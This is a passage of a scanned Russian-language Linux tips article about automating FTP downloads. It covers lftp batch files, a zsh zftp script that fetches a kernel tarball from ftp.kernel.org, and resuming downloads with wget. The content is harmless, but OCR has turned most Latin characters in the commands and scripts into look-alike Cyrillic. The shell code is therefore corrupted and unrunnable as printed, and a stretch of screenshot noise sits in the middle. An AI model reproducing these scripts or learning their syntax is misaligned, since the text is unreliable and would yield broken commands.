понадобится продвинутый ІЙр (есть в любом дистрибутиве). Выпол- 
нение команд в пакетном режиме является одной из его особеннос- 
тей. Чтобы воспользоваться ею, создай файл -/Ійр.аиіо примерно с 
таким содержимым: 

$ ѵі -/Ійр.аиіо 

# задаем имя и пароль пользователя (пустой пароль — "") 
изег пате раззѵѵсі 

# подключаемся к серверу 
Ир Нр. кегпеі. огд 

# далее идут любые стандартные команды Нр-протокола (деі, риі, Із) 
деі ... 

# отключаемся 
ехіі 



іі [ $# != 0 ]; ІГіеп 

ѴЕР=$1 

еізе 

ехіі 

Іі 

гтосііоасі гзб/гіір 

есГю -п "Соппесііпд іо $РТР... " 

2 Йр ореп $РТР 

2 ІІр Іодіп апопутоиз "" >/беѵ/пиІІ 2>&1 
2 Йр Ьіпагу 

2 ІІр ссі риЬ/Ііпих/кегпеІ/ѵ'есГю $ѴЕР I сиі -б "." -I 1-2'/ 
есГю "СІіескіпд Тог пеѵѵ кегпеі..." 

2 Йр Із I дгер Ііпих-${ѴЕР} 

і! [[ $? == 0 ]]; ІГіеп 

есГю -п "Ооѵѵпіоасііпд... " 

2 Йр деі Ііпих-${ѴЕР}.Іаг.Ь22 > Ііпих-${ѴЕР}.Іаг.Ь22 
2 Іір сіозе 

еізе 

есГю "Кегпеі $ѴЕЯ боезпТ ехізі." 

2 Іір сіозе 
Іі 



Скрипт предназначен для закачки ядра І_іпих с официального Йр-сер- 
вера. Запускать следует с одним параметром — версией ядра. Как 
можно заметить, гйр оперирует стандартными командами любого Йр- 
кпиента с той лишь разницей, что после исполнения каждой команды 
управление возвращается обратно к шеллу. Благодаря этой особен- 
ности можно полностью контролировать весь диалог клиента с сер- 
вером, для чего раньше приходилось использовать ехресі. 

Если есть необходимость слить файлы с ййр-сервера, можно вос- 
пользоваться неинтерактивным йіір-клиентом ѵѵдеі. Я применяю его 
в автономных интернет-соединениях, как было показано в предыду- 
щем разделе. 



$ ѵѵдѳі ШЬ 



Задай правильные права доступа на этот файл (чтобы никто не 
подсмотрел пароль): 

$ сГітосІ 600 -/Ійр.аиіо 

И запусти ІЙр такой командой: 

$ ІЙр -I -/Ійр.аиіо > -/ІЙр.Іод 



Рір-клиент выполнит все твои команды и отключится от сервера. От- 
веты сервера на приведенные команды запишутся в файл -/ІЙр.Іод 
(по умолчанию они выводятся на экран). Этот файл может стать 
очень полезным, если в скрипте применяется команда рекурсивного 
обхода каталогов (Із -В). Используя один скрипт, можно организо- 
вать соединение сразу с несколькими Йр-серверами. 

Соединения с Йр можно сделать еще более автономными, если ис- 
пользовать расширение гзй под названием 2Йр. Это встроенный в 
шелл Йр-клиент, позволяющий интегрировать команды Йр-протокола 
прямо в скрипты. Для демонстрации мощи такой технологии рас- 
смотрим следующий скрипт: 



$ ѵі ~/деІ_кегпеІ.23й 

#!/Ьіп/2зГі 
г ТР=Йр. кегпеі. огд 



1 /ртг .ТТЛ 7 ■ Щ I 1 

ЙРЙІЧ Ш ІІР МПЦІ-РЕн і йя» 

щ ІР № ѵп*1,+, 

3 іпія^. 6. 35, 3 ■ №■№ іірі 

4 4г.і--3-в.1Э 1 .іиг-Еі 
3 іги.- «3-6- 35, 3 - 
34Ш- -5-6- 33,3 
Мпм-ІА-М&ЛГ-ІЯі 
1 

34г»-5-6~35-^яг Ет 
3 1ГЫ-.Ч--І- 33, -Г, I»- Е? - іЗ-еп 

3 4ГЦ,- . 35-Г- 1 *3-рі 

Зіпі Л -г.6-35-5.1^-№ 

4 4П1- 33. . 5 1 ЕН 

ііъж-гл<іьЛАт.ѵ 
\ ІПл-г.1, I У. |Е .ІІР 
ІШл-2.1, 1 1.І. I іг. 

ІІЛл-2.^ 1І.-* . I *г_0>? 

1 ЗПл-г.1, . I йг_в>2 . я-1[и 

\ ЗІЧк-2.*. . I іг_ іі(р1 

і іі. . іі^іі 

14Пл-2!.І,іЛ.І 
\ згич-2.4, іі. іт. ее .-іір 
ІІАЛ-2.^Ц,1ІГЛІ|П 
иппзомі-ті:- . 



наш скрипт работает! 



Файл будет скачан в 
текущий каталог. Ты 
можешь столкнуться с 
ситуацией, когда файл 
имеет слишком боль- 
шой размер и не может 
быть слит в рамках од- 
ного соединения. Как 
быть? Если значитель- 
ная часть файла уже 
скопирована, а время 
поджимает, то можно 
прибить ѵѵдеі либо ко- 
мандой «кіІІаІІ ѵѵдеі», 
либо комбинацией 
«СТР1_+С». Во время 
следующего сеанса со- 
единения надо возоб- 
новить процесс скачи- 
вания командой: 

$ ѵѵдеі -с ЫНЬ 

А еще ѵѵдеі можно 
превратить в настоя- 
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